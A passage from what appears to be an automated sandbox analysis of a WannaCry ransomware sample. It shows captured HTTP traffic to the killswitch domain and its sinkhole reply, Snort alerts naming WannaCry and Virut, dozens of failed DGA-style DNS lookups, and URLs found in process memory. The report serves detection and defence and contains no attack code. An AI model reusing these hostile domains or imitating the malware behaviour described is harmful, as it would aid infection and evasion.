6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Jul 2022 15:54:08 GMTContent-Type: text/htmlContent-Length: 607Connection: closeServer: cloudflareCF-RAY: 72dcdfaacf3c9046-FRAData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2024291 ET TROJAN Possible WannaCry DNS Lookup 1 192.168.2.4:60506 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.4:49756 -> 104.16.173.80:80
              Source: TrafficSnort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.16.173.80:80 -> 192.168.2.4:49756
              Source: TrafficSnort IDS: 2012730 ET TROJAN Known Hostile Domain ilo.brenz .pl Lookup 192.168.2.4:60381 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024281 ET TROJAN Known Hostile Domain ant.trenz .pl Lookup 192.168.2.4:56509 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024291 ET TROJAN Possible WannaCry DNS Lookup 1 192.168.2.4:58171 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.4:49792 -> 104.17.244.81:80
              Source: TrafficSnort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.17.244.81:80 -> 192.168.2.4:49792
              Source: TrafficSnort IDS: 2811577 ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com) 8.8.8.8:53 -> 192.168.2.4:52472
              Source: TrafficSnort IDS: 2811577 ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com) 8.8.8.8:53 -> 192.168.2.4:50121
              Source: TrafficSnort IDS: 2811577 ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com) 8.8.8.8:53 -> 192.168.2.4:57546
              Source: TrafficSnort IDS: 2012730 ET TROJAN Known Hostile Domain ilo.brenz .pl Lookup 192.168.2.4:63284 -> 8.8.8.8:53
              Tries to resolve many domain names, but no domain seems valid
              Source: unknownDNS traffic detected: query: uuvznv.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: nsnpie.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: dsebsq.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: kvzuyb.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: picaiu.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ryeofz.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: wwflce.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: xpuiqt.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: iegroa.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: swihwi.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ohpqsg.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: kkujyi.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: iigysp.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ytohqg.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: veadit.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: halijb.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: fmghaw.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: aqoyoy.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ppdeuk.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: oyjapg.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ecihey.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: gveozl.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ehoouc.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: yupiov.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: lbhuwa.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: odknak.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: iqkpke.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: pamieb.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: csvfep.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: rhekpv.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ouuquq.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: oyiqis.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: naciyn.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: zajvof.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: wdsbch.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: gyrtfu.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: odkwag.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: btstvf.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: rybavi.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: yilrau.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: pzrdea.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: exylvw.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ipffhg.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: bxgyim.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: bjnyie.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: punodi.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: fotkqb.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: fmleqf.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ywhiza.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: vscxig.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: buquni.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: iuzrbo.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: fnkuzp.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: gieomq.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ilezol.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: egzhiu.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: umdeki.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: yyoujc.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: oattpq.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: uyhjyx.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: rayrbu.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: riwegs.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: xnynlv.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: qdauqi.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: wzzoyp.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: eyueag.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: zjercf.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: evcswy.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ivhjyg.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ppuoul.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: wxqeub.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: kxvxyi.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: imeonl.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: parenq.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: pbswoe.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: juiape.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: daufsi.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: kdbimr.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: jreavt.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: uehixu.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ieuydr.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: dlaiin.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: poyvid.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ryrgex.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: hmogya.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: zrsyos.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: foefmh.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: xpokac.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: bixitk.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: bwhvdc.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: eunure.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: ttaxui.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: seumyy.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: tqrihq.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: cjtnlz.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: taseju.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: qzemuq.com replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: pjyjyp.com replaycode: Name error (3)
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 104.16.173.80 104.16.173.80
              Source: Joe Sandbox ViewIP Address: 104.16.173.80 104.16.173.80
              Source: svchost.exe, 00000021.00000000.396028620.00000247D1CC9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.800444003.00000247D1CC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: @http://www.facebook.com equals www.facebook.com (Facebook)
              Source: lsass.exe, 00000009.00000000.276984824.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.806421326.00000240B2CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.289486154.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/
              Source: lsass.exe, 00000009.00000000.276984824.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.806421326.00000240B2CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.289486154.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: lsass.exe, 00000009.00000000.289233037.00000240B2CB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.276984824.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.806421326.00000240B2CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.294955157.00000240B2DC5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.276966511.00000240B2CB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.289486154.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.277644417.00000240B2DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: svchost.exe, 00000010.00000002.817831734.0000025CB59A3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.304006105.0000025CB59A3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.308802348.0000025CB59A3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cdn.content.prod.cms.msn.com/singletile/summary/alias/experiencebyname/today?market=en-US&sou
              Source: lsass.exe, 00000009.00000002.802394301.00000240B2C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.276441370.00000240B2C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.286272280.00000240B2C00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.682240230.000001FF10C87000.00000004.00000020.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000002.543078943.0000019B7D346000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000000.486550172.000001D4265E3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: lsass.exe, 00000009.00000000.276000241.00000240B2694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.799419871.00000240B26AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.285841175.00000240B2694000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
              Source: svchost.exe, 00000019.00000002.682240230.000001FF10C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: lsass.exe, 00000009.00000000.276984824.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.806421326.00000240B2CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.289486154.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: lsass.exe, 00000009.00000000.289233037.00000240B2CB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.276984824.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.806421326.00000240B2CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.276966511.00000240B2CB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.289486154.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: lsass.exe, 00000009.00000000.276984824.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.806421326.00000240B2CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.289486154.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.361644460.0000019B7D30A000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.343598863.0000019B7D30A000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.388083643.0000019B7B6EB000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000002.529983320.0000019B7B6EB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: lsass.exe, 00000009.00000000.276984824.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.806421326.00000240B2CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.289486154.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: lsass.exe, 00000009.00000000.289233037.00000240B2CB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.276984824.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.806421326.00000240B2CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.276966511.00000240B2CB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.289486154.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: lsass.exe, 00000009.00000002.803314841.00000240B2C23000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.276526504.00000240B2C23000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.286477418.00000240B2C23000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: lsass.exe, 00000009.00000002.800243000.00000240B26C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.286050991.00000240B26C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.276087553.00000240B26C1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: lsass.exe, 00000009.00000000.276984824.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.806421326.00000240B2CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.289486154.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: lsass.exe, 00000009.00000000.276984824.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.806421326.00000240B2CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.289486154.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.361644460.0000019B7D30A000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.343598863.0000019B7D30A000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.388083643.0000019B7B6EB000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000002.529983320.0000019B7B6EB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
              Source: lsass.exe, 00000009.00000000.289233037.00000240B2CB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.276984824.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.806421326.00000240B2CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.294955157.00000240B2DC5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.276966511.00000240B2CB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.289486154.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.277644417.00000240B2DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
              Source: lsass.exe, 00000009.00000000.275930950.00000240B2685000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.797744987.00000240B2685000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.276984824.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.806421326.00000240B2CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.289486154.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.285808144.00000240B2685000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.361644460.0000019B7D30A000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.343598863.0000019B7D30A000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000002.541901336.0000019B7D300000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
              Source: lsass.exe, 00000009.00000000.276000241.00000240B2694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.799419871.00000240B26AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.285841175.00000240B2694000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gtsr100
              Source: lsass.exe, 00000009.00000000.276000241.00000240B2694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.799419871.00000240B26AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.285841175.00000240B2694000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
              Source: backgroundTaskHost.exe, 0000001C.00000000.356343583.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.342288131.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.360482512.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.351846295.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.347247275.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.387936226.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.383393856.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.370724756.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.392409764.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.378513051.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000002.528374745.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.365406036.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schema.org/reminderper
              Source: svchost.exe, 00000014.00000002.326573506.000001C91F613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
              Source: lsass.exe, 00000009.00000000.289233037.00000240B2CB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.276984824.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.806421326.00000240B2CC0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.294955157.00000240B2DC5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.276966511.00000240B2CB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.289486154.00000240B2CBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.277644417.00000240B2DC5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
              Source: svchost.exe, 00000021.00000000.396028620.00000247D1CC9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000021.00000002.800444003.00000247D1CC9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
              Source: mssecsvc.exe, 0000000B.00000000.278777531.000000000040F000.00000008.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
              Source: mssecsvc.exe, 00000006.00000002.361347885.0000000000D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
              Source: mssecsvc.exe, 00000006.00000002.361347885.0000000000D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer
              Source: mssecsvc.exe, 00000006.00000002.361347885.0000000000D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/l
              Source: mssecsvc.exe, 00000006.00000002.361347885.0000000000D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/x
              Source: mssecsvc.exe, 00000006.00000002.361347885.0000000000D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comC
              Source: mssecsvc.exe, 00000004.00000002.663004539.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ
              Source: svchost.exe, 00000011.00000002.793454097.000001F18B83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
              Source: svchost.exe, 00000011.00000002.793454097.000001F18B83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
              Source: svchost.exe, 00000011.00000002.793454097.000001F18B83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
              Source: svchost.exe, 00000014.00000003.325617470.000001C91F65F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
